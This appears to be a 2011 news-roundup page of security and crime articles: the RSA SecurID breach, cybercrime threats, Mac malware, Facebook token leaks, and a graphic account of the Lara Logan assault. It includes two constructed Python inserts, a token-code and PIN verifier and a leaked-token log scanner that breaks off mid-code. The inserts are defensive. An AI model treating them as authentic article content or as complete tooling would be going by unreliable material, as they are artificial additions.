Reports suggest Lockheed has temporarily disabled remote access and sent 90,000 replacement keys to staff. Employees were also told to reset all passwords as a precaution.

Sources said military contractors typically do not keep classified data on computers that can be accessed remotely. Other defence groups use the keys sold under the SecurID brand and the Pentagon confirmed it also uses a limited number.

Raytheon, a top-five US defence group, said it took immediate company-wide action when the RSA breach emerged. It said: "As a result of these actions, we prevented a widespread disruption of our network."

Boeing said it had a "wide range" of systems in place to detect and prevent network intrusions.

SecurID keys generate a string of digits that users must enter along with a secret identification number before they can access their company's computer network remotely. If a user fails to enter the string correctly before it expires, then access is denied.
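The check described above, and the reason a copied key record means tokens have to be replaced, shown as an added example that is not part of the original article and is not RSA's own SecurID algorithm: it uses the open RFC 6238 time-based code scheme as a stand-in. The names `token_code` and `TokenAccount`, the PIN and the replacement seed are constructed for illustration, and the 60-second default code lifetime is an assumption.

```python
"""Time-limited token codes checked together with a PIN (RFC 6238 stand-in)."""
import hashlib
import hmac
import os
import struct


def token_code(seed: bytes, unix_time: int, step: int = 60, digits: int = 6) -> str:
    """Return the digits a token holding `seed` displays at `unix_time`."""
    counter = unix_time // step                      # changes once per time step
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                          # RFC 4226 dynamic truncation
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


class TokenAccount:
    """Server-side record for one user: the token seed plus a salted PIN hash."""

    def __init__(self, seed: bytes, pin: str, step: int = 60, digits: int = 6):
        self.seed, self.step, self.digits = seed, step, digits
        self.salt = os.urandom(16)
        self.pin_hash = self._hash_pin(pin)
        self.last_counter = -1                       # last time step accepted

    def _hash_pin(self, pin: str) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self.salt, 100_000)

    def reissue(self, new_seed: bytes) -> None:
        """Replace the token: codes derived from the old seed stop working."""
        self.seed = new_seed
        self.last_counter = -1

    def verify(self, pin: str, code: str, now: int) -> bool:
        """Accept only the right PIN plus the code for the current time step."""
        pin_ok = hmac.compare_digest(self._hash_pin(pin), self.pin_hash)
        counter = now // self.step
        expected = token_code(self.seed, now, self.step, self.digits)
        code_ok = hmac.compare_digest(code.encode(), expected.encode())
        fresh = counter > self.last_counter          # refuse reuse of a code
        if pin_ok and code_ok and fresh:
            self.last_counter = counter
            return True
        return False


def demo() -> dict:
    """Run the checks on constructed data and return each outcome."""
    seed = b"12345678901234567890"        # published RFC 6238 test seed
    acct = TokenAccount(seed, pin="4821", step=30, digits=8)  # constructed PIN
    code = token_code(seed, 59, step=30, digits=8)
    out = {"code": code}
    out["wrong_pin"] = acct.verify("0000", code, 59)   # right digits, wrong PIN
    out["valid"] = acct.verify("4821", code, 59)       # PIN and digits both right
    out["replayed"] = acct.verify("4821", code, 59)    # same code offered again
    later = 1111111109
    out["expired"] = acct.verify("4821", code, later)  # old digits, later time

    # A copy of the seed record yields the same digits as the genuine token,
    # so only the PIN still separates the holder of the copy from access.
    copied = bytes(seed)
    duplicate = token_code(copied, later, step=30, digits=8)
    out["duplicate_accepted"] = acct.verify("4821", duplicate, later)

    # Issuing a replacement token (new seed) makes the copied seed useless.
    acct.reissue(b"constructed-replacement-seed")
    stale = token_code(copied, later + 30, step=30, digits=8)
    out["duplicate_after_reissue"] = acct.verify("4821", stale, later + 30)
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```
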

(1st June 2011)


 


LARA LOGAN - "THEY RAPED ME WITH THEIR HANDS"
(The Times, dated 30th April 2011 author Anne Barrowclough)
www.thetimes.co.uk  [Note 1]

For 40 minutes at the height of the Egyptian revolution, the TV journalist Lara Logan thought that she was going to die as she was violently molested by a mob of up to 300 men, she has disclosed.

Logan, a former GMTV reporter, described for the first time her ordeal in Tahrir Square, Cairo, on the night of President Mubarak's resignation two months ago. The 60 Minutes interview will be broadcast in the US tomorrow.

She and her colleagues were filming what they thought were jubilant crowds when "everything went wrong", she said. Her Arabic-speaking cameraman heard onlookers talking about removing her trousers, and urged the crew to leave, she said, but by then it was too late. Set on by a horde of between 200 and 300 men, she was stripped, beaten and abused for more than half an hour.

"My clothes were ripped to pieces," she said. "For an extended period they raped me with their hands. What really struck me was how merciless they were. They really enjoyed my pain and suffering. I thought, 'Not only am I going to die here, but it's going to be just a torturous death that's going to go on for ever and ever'."

Logan was eventually pulled from the crowd by Egyptian soldiers after a group of women raised the alarm. She was flown out of Egypt within two hours on board a chartered jet. On her return to the US, she spent four days in hospital and was telephoned by President Obama.

Her decision to talk about her ordeal was motivated by a desire to draw attention to the dangers faced by female journalists, especially in countries that discriminate against women. Where women are denied equality, "public spaces don't belong to them", she said.

Logan, 40, was born in Durban, South Africa, and lives in Washington with her second husband, a Texan defence contractor. They have two young children. She returned to work on Wednesday and has said that she will continue to report from war zones - but not, for the time being, from the Middle East.


 

Editor's Note

Try to obtain details of the levels and types of crime that occur in countries that you are planning to visit.
In the Travel section of this website, the extracts of safety advice provided by some guide books appear to state that female travellers should seek the companionship of local women in Egypt. In this story it was the action of Egyptian women that appears to have saved Lara's life.

Your main source of information for foreign travel should be the Foreign and Commonwealth Office website :
www.fco.gov.uk

(1st June 2011)


 


SIX RISING THREATS FROM CYBERCRIMINALS
(Computerworld, dated 19th May 2011 author John Brandon)
www.computerworld.com  [Note 1]

The following is an extract; for the original article [Note 1] see: http://cwonline.computerworld.com/t/7347400/930454165/512742/0/

Whether you're an IT manager protecting employees and corporate systems or you're simply trying to keep your own personal data safe, these threats (some rapidly growing, others still emerging) pose a potential risk.

Fortunately, there are some security procedures and tools available to help you win the fight against the bad guys. For all the other threats we've covered in this story, taking some extra precautions, such as using strong encryption technology, engaging only with trusted friends on social networks, and using penetration testing software on corporate networks can help alleviate some fears, even if the bad guys keep coming up with new ways to make us nervous.

1. Text-message malware

While smartphone viruses are still fairly rare, text-messaging attacks are becoming more common, according to Rodney Joffe, senior vice president and senior technologist at mobile messaging company Neustar and director of the Conficker Working Group coalition of security researchers. PCs are now fairly well protected, he says, so some black-hat hackers have moved on to mobile devices. Their incentive is mostly financial; text messaging provides a way for them to break in and make money.

Khoi Nguyen, group product manager for mobile security at Symantec, confirmed that text-message attacks aimed at smartphone operating systems are becoming more common as people rely more on mobile devices. It's not just consumers who are at risk from these attacks, he adds. Any employee who falls for a text-message ruse using a company smartphone can jeopardize the business's network and data, and perhaps cause a compliance violation.

"This is a similar type of attack as [is used on] a computer -- an SMS or MMS message that includes an attachment, disguised as a funny or sexy picture, which asks the user to open it," Nguyen explains. "Once they download the picture, it will install malware on the device. Once loaded, it would acquire access privileges, and it spreads through contacts on the phone, [who] would then get a message from that user."

In this way, says Joffe, hackers create botnets for sending text-message spam with links to a product the hacker is selling, usually charging you per message. In some cases, he adds, the malware even starts buying ring tones that are charged on your wireless bill, lining the pocketbook of the hacker selling the ring tones.

Another ruse, says Nguyen, is a text-message link to download an app that supposedly allows free Internet access but is actually a Trojan that sends hundreds of thousands of SMS messages (usually at "premium SMS" rates of $2 each) from the phone.

Wireless carriers say they do try to stave off the attacks. For instance, Verizon spokeswoman Brenda Raney says the company scans for known malware attacks and isolates them on the cellular network, and even engages with federal crime units to block attacks.

Still, as Joffe notes jokingly, there is "no defense against being stupid" or against employee errors. For example, he recounts that he and other security professionals training corporate employees one-on-one about cell phone dangers would send them messages with a fake worm. And right after the training session, he says, many employees would still click the link.

To keep such malware off users' phones, Joffe recommends that businesses institute strict corporate policies limiting whom employees can text using company networks and phones, and what kind of work can be done via text. Another option is a policy that disallows text messaging entirely, at least until the industry figures out how to deal with the threats.

For consumers, common sense is the best defense. Avoid clicking on text-message links or attachments from anyone you don't know, and use extreme caution even with messages from known contacts, who might unwittingly be part of a botnet.


2. Hacking into smart grids (operational within the US, but coming to the UK soon)

A common misconception is that only an open network -- say, your corporate wireless LAN for visitor access -- is hackable. Not true, says Justin Morehouse, a principal consultant at Stratum Security who spoke about network security at last year's DefCon security conference. Morehouse says it's actually not that difficult to find an access point into a so-called closed system.

For example, the Stuxnet worm last year infected tens of thousands of Windows PCs running Siemens SCADA systems in manufacturing and utility companies, most notably in Iran, and it was largely spread via infected USB flash drives. Even some nuclear plants and power grids have wireless networks for employees to use.

"Stuxnet proved that it is relatively simple to cause potentially catastrophic damage" to an industrial control network, says Neustar's Joffe.

According to Morehouse, another new attack point will be smart grids, which use electronic metering to streamline power management. Utility companies around the world have begun testing and rolling out smart meters to customers' homes and businesses. The technology, which can send data to and receive it from a central system, can also be very helpful for IT: You can open a console to see the power usage for one section of a building, for example.

But smart grids might be vulnerable to attacks that would allow nefarious hackers to cut off electricity to homes and businesses and create other kinds of havoc. One possible attack vector is a smart grid's communications infrastructure. For example, Morehouse says, a German utility company called Yello Strom uses a consumer smart grid system that works like a home automation kit -- the sensors report energy usage back to the central server via the user's home Wi-Fi network.

Because of this, Morehouse says, it is possible for end users to tap into their own networks and gain access to the substation used for delivering power. "Often it's the case that these types of networks are not properly segmented or protected," he says. "Once in, the attacker may be treated as a trusted user and have access to other areas. Is there the potential that they could disrupt the substation or city? Absolutely. They may plant a back door that could allow the grid to be powered down at a particular time."

Another concern is vulnerabilities in the smart meters themselves -- a problem that affects corporate smart grids as well. Researchers from Seattle-based security services vendor IOActive, for instance, discovered several bugs in smart grid devices that criminal hackers could exploit to access the smart grid network and cut power to customers.

"Hackers use press releases to find out the technologies [used in corporate smart grids] and go back to the infrastructure and find vulnerabilities. So, for example, if Wal-Mart announces a smart grid using Siemens technology, a hacker suddenly has many of the answers they need to find that controller and break in," Morehouse says.

The most effective preventive measure, says Morehouse, is rigid isolation; a smart grid should not touch any other network, ever. He says there is an urgent need for penetration testing and making sure the firewall in a closed network is secure because of the possible dangers of gaining access to the power grid. He advises using tools such as Core Impact and Metasploit.

The "rigid isolation" rule applies to home users as well. "Consumers should never bridge smart grid networks with their home networks," says Morehouse. He also advises home users to become familiar with their smart meters so they can recognize whether they have been tampered with, and to ask their utility providers what security measures are in place to protect the meters and network.

3. Social network account spoofing

Many of us use Facebook, LinkedIn and other social networks to connect with friends, family and colleagues -- which leaves us vulnerable to a new technique called social network account spoofing. The idea is that a scammer poses as either someone you know or a friend of a friend to get close to you and fool you into revealing personal information. He then uses that information to gain access to your other accounts and eventually steal your identity.

Someone contacts you on a service like Facebook or LinkedIn, posing as a friend of a friend or a co-worker of someone you trust. Then, the new "friend" contacts you directly, usually through text message or email. It might seem surprising to have this "friend" contact you outside the social network, but he seems legitimate because you believe he has a connection with someone you trust.

In another scenario, a scammer might impersonate someone you already know -- claiming to be an old friend from high school, for instance. Spoofers can find out your connections by following your public feeds or looking up the names of co-workers on sites like LinkedIn where you have posted your work info.

Once the scammer has established a connection with you, he uses devious means to steal personal data, such as chatting to find out the names of family members, favorite bands, hobbies and other seemingly innocuous information -- then trying those as passwords or answers to security questions at banking sites, webmail accounts or other sites.


What's more, social network attacks are sometimes combined with email and website spoofing, Morehouse says. You might develop a friendship on LinkedIn and then get an email from that person that looks like it was sent via LinkedIn but is actually a fake. When you click the link to reply to the message, you're taken to a fake LinkedIn site; logging in there reveals your LinkedIn username and password to the spoofer.

As with text-message attacks, individuals' best defense against spoofing attacks is to use common sense, Joffe says -- criminals usually do not do a good job of impersonating a person or company, and they tend to send links and phishing scams to con you. They might try to mimic a friend but rarely manage to accurately convey their personality. In some cases, the attacks are traceable through e-mail headers or IP addresses, and most attacks are too general and untargeted to be believable to anyone who's careful.

Other precautions might seem obvious but are often overlooked. If someone says he's a friend of a friend or co-worker, make sure you confirm his identity with your common connection. And it's a good idea to lock down your privacy settings at social networking sites so that your contact info, posts, photos and more aren't visible to everyone. In Facebook, for example, select Account --> Privacy Settings --> Custom and click the "Customize settings" link at the bottom to gain control over exactly what you want to share with everyone, friends of friends, friends only or no one.

4. Cyberstalking

Social networks like Twitter and Facebook have changed the way we communicate in our personal and work lives, many would say for the better. Yet these useful portals also provide conduits that others can use to make our lives miserable.

A relatively new concept variously called cyberstalking, cyberharassment or cyberbullying involves an individual or a group making repeated personal attacks online, such as posting negative comments on every tweet you make or posting crude altered photos of you on a social network. The perpetrators may hide behind online aliases to hide their identities.

Most of us have heard of a handful of well-publicized cases of cyberbullying among teens, but it's also on the rise for adults who connect to social networks from their place of employment, according to Kathleen Baty, a personal safety consultant and CEO of SafetyChick Enterprises. These workplace-related attacks might involve another employee, or someone trying to steal company information.

"Cyberstalking in the workplace has become more and more common and is tough to define because there are so many different forms to threaten or harass in this digital world and so many different motives behind the behavior. It can be anything from a personal/romantic relationship gone bad, to a co-worker/business conflict, to a competitor trying to wreak havoc on a company," says Baty.

To keep cyberstalkers off company networks, businesses should implement all the usual corporate security tools, such as firewalls and encryption, Baty says. Additionally, companies should institute a social media policy that outlines clear guidelines for what kinds of information employees should and should not post or discuss on public sites.

If you do become a victim of cyberstalking or cyberbullying, Baty advises you to report it immediately to local law-enforcement authorities; if it happens at work, report it to your HR department as well. Don't delete harmful posts or other electronic communications, she says, but instead retain all documentation of incidents, mainly as evidence but also because the headers for e-mail and forum postings can be used to track down the offender.

That said, the best defense is to protect your personal information as carefully as you can. For instance, never reveal online such details as where you live, and don't announce your movements, such as that you are on vacation or home sick and have left your workplace computer open to attack.

5. Hackers controlling your car

The age of the connected car is dawning. Vehicles like the Ford Edge now provide 3G network access, a Wi-Fi router in the car, and the ability to tap into your home Wi-Fi network (only while parked). In the next few years, more automakers will provide wireless access for Web browsing and streaming high-def movies. And by 2013, a new FCC-mandated wireless signal called DSRC (dedicated short-range communications) will run at 5.9GHz and provide a vehicle-to-vehicle communication network.

For anyone who follows network computing or computing in general, adding these new features to a moving vehicle should raise a red flag as yet another way criminal hackers can cause problems. Since these systems often tap into the car diagnostics and safety features, a hacker could potentially interfere with such systems and, for example, cause a car's engine to surge at just the wrong time, says Stephan Tarnutzer, chief operating officer at automotive control console manufacturer DGE.

While no real-world exploits are known to have happened, security researchers from the University of California, San Diego, and the University of Washington have hacked into the computers of several late-model cars and remotely disabled the brakes, altered the speedometer reading, turned off the engine, locked passengers into the car and more.

The research team's initial tests relied on plugging a laptop into the car's diagnostic system, but later tests identified other entry points for an attack, including the cars' Bluetooth and cellular connections. More wireless communications in future cars will create even more attack vectors.

The good news, Tarnutzer says, is that most of the forthcoming wireless technology for cars is for short-range communications, from one lane to another or just as you pass through an intersection. That makes it difficult for hackers because they need to be in close proximity to the car.

Nevertheless, wireless connections in cars will undoubtedly make a tempting target for hackers. The answer, says Tarnutzer, is for the auto industry to use strong, hardware-based encryption technology. Car companies are, of course, aware of the potential for hackers to disrupt in-car wireless services. Representatives from Ford and GM, for instance, said they are developing strong encryption standards for vehicle-to-vehicle and vehicle-to-back-end-infrastructure communications.

6. GPS jamming and spoofing: Threat or nuisance?

Jamming a GPS signal at the source is next to impossible, says Phil Lieberman, founder of enterprise security vendor Lieberman Software. Blocking the radio signals broadcast from orbiting GPS satellites would require a massive counter-transmission. And because the satellites are operated by the U.S. military, jamming them would be considered an act of war and a federal crime, says Lieberman.

However, it is easy to jam GPS receivers with a low-cost jamming device like one sold by Brando. The devices jam the GPS reception by overloading it with a similar signal -- the receiver becomes confused because it can't find a steady satellite transmission.

Lieberman says this kind of jamming is usually more of an annoyance than a major security threat. A nefarious hacker could, for instance, set up a jammer in an intersection and temporarily disable the GPS in passing vehicles. These attacks are relatively rare, says Lieberman: "It is usually just sociopaths doing this kind of thing."

Security expert Roger Johnston, a systems engineer at the Argonne National Laboratory in Chicago, says spoofing GPS signals is the greater danger, explaining that GPS receivers are low-power devices that latch on to any strong signal. In tests, he has set up a GPS spoofing signal, operated out of a passenger car, that sends erroneous GPS information to nearby receivers. "You don't have to know anything about electronics or GPS to set these up; they are very user-friendly," says Johnston.

Johnston says spoofing could be used for serious crimes, such as transmitting information to a delivery truck that routes it into a dark alley where criminals are waiting, changing the timestamps on financial transactions, delaying emergency vehicles from finding their routes. There have been no reported cases of GPS spoofing to commit a criminal act, but Johnston warns that government and business should work to deter the attacks.


(1st June 2011)


 

WEBSITES MUST GET CONSENT FOR COOKIES
(Courtesy of : Computer Active, dated 26th May 2011)
www.computeractive.co.uk  [Note 1]

Changes to the way companies can use "cookies" will be in force by the 26th May 2011.

An amendment to the EU Privacy and Electronic Communications Regulations says that explicit consent now has to be obtained from users or subscribers to a site before a company can place a cookie on their PC.

Cookies are text files that are downloaded to a PC when a website is visited. They store information about an internet user's online interests and which websites they visit. While most are benign and often needed for some services, others gather and store more personal data about web users' "behaviour" than many privacy experts feel is necessary or desirable.

It is already possible to opt out of using cookies (www.computeractive.co.uk/1915747) [Note 1]. But the current difficulty is that the authorities have not yet put in place a method of notifying consumers.

The Information Commissioner's Office (ICO) has told companies that they can "choose to make their own switch-off facilities available, or explain to the user or subscriber how they can use the facilities specific to their browser type".

Christopher Graham, Information Commissioner, said: "The implementation of this new legislation is challenging and involves significant technological considerations."

As we were going to press (Computer Active), the ICO told us it was working on draft guidance for consumers that would be available for 26th May 2011.

Information Commissioner's Office website : www.ico.gov.uk


 

Additional information

The ICO has quoted the following website as a source of information on cookies : www.allaboutcookies.org/

Please note that the uaware.org.uk website currently sends cookies to its readers' PCs. This is currently standard practice and all websites carry out the procedure (even government bodies like the Information Commissioner's Office). This is a default facility that currently cannot be turned off and we are reliant on our supplier to make changes to their systems. Our supplier (mrsite.co.uk) has been requested to turn off the cookie facility as soon as possible.

No marketing or tracking action (other than a website visitor counter) is carried out by the operator of the uaware.org.uk website as a result of these cookies being loaded.

Please see the Information Commissioner's Office News Release dated 26th May 2011 which is on the E-PRIVACY DIRECTIVE webpage of this website (see menu tab on the left).

(26th May 2011)


 


SACK KEN CLARKE OVER RAPE COMMENTS - MILIBAND
(BBC News, dated 18th May 2011)
www.bbc.co.uk

Ken Clarke should be sacked as justice secretary following his remarks about rape on BBC Radio 5 live, Labour leader Ed Miliband has said.

Mr Clarke disputed claims changes to sentencing rules could see rapists let out in 15 months for pleading guilty.

He said violent "serious rape" had longer terms and average sentencing figures were skewed by underage sex between consenting teenagers.

Mr Miliband said the PM should distance himself from the remarks.

The row follows plans to halve jail terms for people who plead guilty early, including rapists, who on average are sentenced to five years.

'Serious rapes'
 
At present, a defendant entering an early guilty plea can earn up to a third off their sentence. But proposals to halve sentences are outlined in a Green Paper on sentencing in England and Wales.

At prime minister's questions, Mr Miliband said Mr Clarke had suggested there were "serious rapes and other categories of rape" adding: "The justice secretary can't speak for the women of this country when he makes comments like that."

David Cameron told MPs rape was "one of the most serious crimes that there is and it should be met with proper punishment" and the "real disgrace" was that only 6% of reported rape cases ended in a conviction.

He said there was already a plea bargaining system in the UK and the government was only consulting on whether to extend - and had not yet decided what crimes it should include.

The prime minister said he had not heard the interview but the government's position was clear - that rape was serious and should be punished "very severely".

But Mr Miliband told him to go back and listen to the interview adding: "The justice secretary should not be in his post at the end of today."

'Strongest example'
 
Earlier Labour former solicitor general Vera Baird QC told BBC Radio 4's Today programme the standard sentence for rape started at five years.

"If you are talking about halving it to two-and-a-half years and then a person gets out halfway through their sentence on licence which is usual, then we are talking about sentences of 15 months which have no regard at all for the gravity of the offence and gives no time for rehabilitation or training," she said.

The current discount of a third for an early guilty plea was the maximum and not automatic, she added.

But Mr Clarke told Victoria Derbyshire on BBC Radio 5 Live that pushing for an early guilty plea would stop rapists "messing about" and denying charges and would relieve the victim of "going through the whole ordeal again and of being called a liar... we still have far too many people who don't plead guilty in the first place".

He dismissed suggestions rapists could be out in 15 months as "total nonsense".

On being told that the sentence for rape was five years on average, according to the Council of Circuit Judges, Mr Clarke said: "That includes date rape, 17-year-olds having intercourse with 15 year olds.."

"Serious rape - I don't think many judges give five years for a forcible rape frankly, the tariff is longer than that. A serious rape with violence and an unwilling woman - the tariff is longer than that."

When BBC interviewer Victoria Derbyshire interrupted to say "Rape is rape, with respect" Mr Clarke replied: "No it's not, if an 18-year-old has sex with a 15 year old and she's perfectly willing, that is rape. Because she is under age, she can't consent... What you and I are talking about is we are talking about a man forcibly having sex with a woman and she doesn't want to - a serious crime."

He also said date rapes were included in the figures which could be "sometimes very confusing" adding: "Date rape can be as serious as the worst rapes but date rapes... in my very old experience of being in trials [from his time as a practising lawyer]... they do vary extraordinarily one from another, and in the end the judge has to decide on the circumstances."

'Extraordinary spin'
 
He was challenged by a caller, a woman from London, who said she had been the victim of an attempted rape while training for the London marathon - and had fought the criminal justice system for 688 days, only for the rapist to have his sentence reduced for pleading guilty - and then go on to commit another offence.

She told him: "It happened to me. It's a disaster, especially with sex offenders."

A Downing Street spokesman said Mr Clarke was not relaying government policy and would want to make it clear how seriously he takes all rape cases. Asked if Mr Clarke would survive the day in his post, he added: "Yes".

Shadow home secretary Yvette Cooper said Mr Clarke "has to go if he stands by these comments because they are absolutely appalling".

But Mr Clarke told the BBC the "most extraordinary spin" had been put on his comments: "Rape is a very serious crime, that is undoubtedly the case, but I responded to average sentence figures being put to me."

He said consenting sex between underage teenagers "does not usually get the same sort of sentence as a violent attack on a woman who doesn't know the man attacking her" which was likely to result in a much longer sentence.

"Individual cases get different sentences because the judge has to reflect how bad a case of rape this is - but all cases of rape are bad, it is a serious crime."


Website comment

This article has not been placed on the website for any political purpose. It appears that there needs to be a total rethink of the laws in respect of sexual crimes. The words used, such as "serious rape", don't make sense; as a layman, is there any other form of rape... "semi-consensual rape", "considerate rape", "the man loved her really rape"? No there isn't, rape is rape.

If the "statistics" are being distorted by the numbers of consensual underage sex cases between teenagers then perhaps the wording of the crime category needs to be changed.

No wonder female groups around the Western World are arranging these "Slutwalks" ! Perhaps as part of the Big Society Mr Clarke needs to listen to what Rape support groups say as far as definitions are concerned when tinkering with sentences rather than what Barristers will be allowed to negotiate for their clients.

Update

BBC News (19th May 2011) Justice Secretary Ken Clarke says he will "choose my words more carefully" after a row over his remarks about rape but dismissed calls for him to quit.

Mr Clarke said he was simply describing a "long-standing factual situation" in which sentences differ depending on the circumstances of a particular rape.

Website Comment : Perhaps it's not what Mr Clarke says, but rather what he thinks and the actions he takes.

(18th May 2011)


ONE IN 14 DOWNLOADS IS MALICIOUS SAYS MICROSOFT
(IDG News Service, dated 17th May 2011 author Robert McMillan)
www.idg.com  [Note 1]

The next time a website says to download new software to view a movie or fix a problem, think twice. There's a pretty good chance that the program is malicious.

In fact, about one out of every 14 programs downloaded by Windows users turns out to be malicious, Microsoft said Tuesday. And even though Microsoft has a feature in its Internet Explorer browser designed to steer users away from unknown and potentially untrustworthy software, about 5 percent of users ignore the warnings and download malicious Trojan horse programs anyway.

Five years ago, it was pretty easy for criminals to sneak their code onto computers. There were plenty of browser bugs, and many users weren't very good at patching. But since then, the cat-and-mouse game of Internet security has evolved: Browsers have become more secure, and software makers can quickly and automatically push out patches when there's a known problem.

So increasingly, instead of hacking the browsers themselves, the bad guys try to hack the people using them. It's called social engineering, and it's a big problem these days. "The attackers have figured out that it's not that hard to get users to download Trojans," said Alex Stamos, a founding partner with Isec Partners, a security consultancy that's often called in to clean up the mess after companies have been hacked.

Social engineering is how the Koobface virus spreads on Facebook. Users get a message from a friend telling them to go and view a video. When they click on the link, they're then told that they need to download some sort of video playing software in order to watch. That software is actually a malicious program.

Social-engineering hackers also try to infect victims by hacking into Web pages and popping up fake antivirus warnings designed to look like messages from the operating system. Download these and you're infected. The criminals also use spam to send Trojans, and they will trick search engines into linking to malicious websites that look like they have interesting stories or video about hot news such as the royal wedding or the death of Osama bin Laden.

"The attackers are very opportunistic, and they latch onto any event that might be used to lure people," said Joshua Talbot, a manager with Symantec Security Response. When Symantec tracked the 50 most common malicious programs last year, it found that 56 percent of all attacks included Trojan horse programs.

In enterprises, a social-engineering technique called spearphishing is a serious problem. In spearphishing, the criminals take the time to figure out who they're attacking, and then they create a specially crafted program or a maliciously encoded document that the victim is likely to want to open -- materials from a conference they've attended or a planning document from an organization that they do business with.

With its new SmartScreen Filter Application Reputation screening, introduced in IE 9, Internet Explorer provides a first line of defense against Trojan horse programs, including Trojans sent in spearphishing attacks.

IE also warns users when they're being tricked into visiting malicious websites, another way that social-engineering hackers can infect computer users. In the past two years, IE's SmartScreen has blocked more than 1.5 billion Web and download attacks, according to Jeb Haber, program manager lead for SmartScreen.

Haber agreed that better browser protection is pushing the criminals into social engineering, especially over the past two years. "You're just seeing an explosion in direct attacks on users with social engineering," he said. "We were really surprised by the volumes. The volumes have been crazy."

When the SmartScreen warning pops up to tell users that they're about to run a potentially harmful program, the odds are between 25 percent and 70 percent that the program will actually be malicious, Haber said. A typical user will only see a couple of these warnings each year, so it's best to take them very seriously.

(18th May 2011)



APPLE MALWARE GOES FROM THEORY TO SERIOUS
(CSO Online, dated 11th May 2011 author Robert Lemos)
www.csoonline.com  [Note 1] 

A theory paper written in 2007 predicted that Apple users would see more malware. Now, those predictions are coming true.

Apple and many Mac users argue that Mac OS X has a special recipe for security that makes it less likely to be infected with malware. Many security researchers counter that the Mac's seeming immunity stems not from its security, but from its lack of market share.

The debate may finally be settled.

The emergence of a serious malware construction kit for the Mac OS X seems to mimic a 2008 prediction by a security researcher. The prediction comes from a paper written in IEEE Security & Privacy (in .pdf), which used game theory to predict that Macs would become a focus for attackers as soon as Apple hit 16 percent market share.

Last week, security researchers pointed to a construction kit for creating Trojans for the Mac OS X as a major issue for Mac users. Currently, three countries -- Switzerland, Luxembourg and the United States -- have Mac market share around that level.

"The kit is being sold under the name Weyland-Yutani Bot and it is the first of its kind to hit the Mac OS platform," Peter Kruse, partner and security specialist at security firm CSIS, writes in a blog post. "CSIS finds this crimekit to be quite disturbing news since Mac OS previously to some degree has been spared from the increasing amount of malware which has haunted Windows-based systems for years."

Weyland-Yutani Bot, named for the corporation in the 1979 movie Alien, is currently being sold by its developers. While it is not the first attack on the Mac OS X, crimeware has enabled criminals in the past to scale up attacks quickly.

"What is happening is that people are testing the waters," says Adam O'Donnell, chief architect of the cloud technology group at SourceFire and the author of the 2008 paper. "It just becomes economically viable to do it, so you start seeing these attacks becoming more common."

The 2008 paper used game theory to calculate when attackers would start seeing a payoff in focusing on the Mac OS X over Windows. It simplified the problem by assuming that all PC users ran antivirus software and that no Mac users did. The assumptions helped reduce the problem down to two factors: the effectiveness of the defenses and the marketshare of the dominant platform.

With detection rates for antivirus in the 80 percent range, the Mac OS X becomes an attractive target around 16 percent marketshare. If PC defenses are better than 80 percent, then the Mac market share at which attackers become interested drops. For example, if antivirus programs detect attacks 90 percent of the time, then attackers will focus on the Mac OS X at approximately 6 percent marketshare, says O'Donnell.

"It is much more of an argument that at the low rates of penetration of the Mac in the market is why there is no malware," he says. "You get a few points up, and like we are seeing now, you will start seeing malware."

Will the same model work to predict when significant malware will appear on smartphone handsets? Not necessarily. One of the assumptions is that the value of compromising a PC and Mac are identical. That assumption is less likely to hold up between a PC and a handset.

"The difference between a PC and a handset is that there is going to be different values in attacking each," O'Donnell says. "That difference will be a big factor in when people move to attacking a new platform."

(18th May 2011)


 

SYMANTEC SAYS FACEBOOK SITE LEAKED INFORMATION
(IDG News Service, dated 11th May 2011 author Robert McMillan)
www.idg.net/idgns [Note 1]

A programming bug on Facebook's website may have accidentally given advertisers and others access to a treasure trove of personal information, according to security researchers at Symantec.

They posted details of the issue Tuesday, saying it may have affected nearly 100,000 Facebook applications for years now.

According to Symantec, certain Facebook applications have been inadvertently handing advertisers access tokens -- strings of numbers and letters that can be used by a browser to access Facebook accounts over the Web. "Access tokens are like the 'spare keys' granted by you to the Facebook applications," Symantec said in a blog post. "Each token or 'spare key' is associated with a select set of permissions, like reading your wall, accessing your friend's profile, posting to your wall, etc."

Users habitually grant this type of access to Facebook applications so they can do things such as write on profile walls, but by handing over these tokens to others, application developers were accidentally giving advertisers or online analytics companies a way to get at this information too.

"We estimate that over the years, hundreds of thousands of applications may have inadvertently leaked millions of tokens to third parties," Symantec said.

The tokens were leaked in referring URLs that Facebook applications passed on to advertisers and others. That shouldn't have happened.

But Facebook says there's no evidence that these tokens were ever misused -- something that would have violated Facebook developer and advertising policies. The company has "conducted a thorough investigation which revealed no evidence of this issue resulting in a user's private information being shared with unauthorized third parties," Facebook said in a statement.

Facebook opened up its social network to third-party Web developers in 2007, and they've become key to the site's phenomenal success. But security experts have said that users should be careful to only authorize Facebook apps that they really want to use.

Symantec said it's not clear whether anyone realized that this problem existed, so it's possible that nobody has taken advantage of the bug to snoop on users.

Facebook has now fixed the problem, but it could still be a big problem for users, according to Symantec. That's because these tokens may still be in circulation, stored in server log files or in other places on the Web.

One of these access tokens will keep working until the Facebook user changes his password, so Symantec said that concerned users should change their Facebook passwords, like "changing the lock" on their Facebook account.

The issue doesn't affect Facebook applications that use the newer OAUTH2.0 authentication system, Symantec said.

(18th May 2011)
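The Facebook article above notes that leaked tokens may still sit in server log files. The following is an added example, not part of the original article and not Symantec's or Facebook's code: a Python scanner that finds token-bearing URLs in the request and Referer fields of Combined Log Format lines and redacts them. The parameter names and the sample log lines are assumptions constructed for illustration.

```python
"""Find and redact access tokens that leaked into web server access logs."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumption: parameter names under which a token may travel in a URL.
SENSITIVE_PARAMS = {"access_token", "oauth_token"}
REDACTED = "REDACTED"

# Combined Log Format:
# host ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines (documentation IP ranges, made-up token values).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2011:09:14:02 +0000] "GET /ad?slot=3 HTTP/1.1" '
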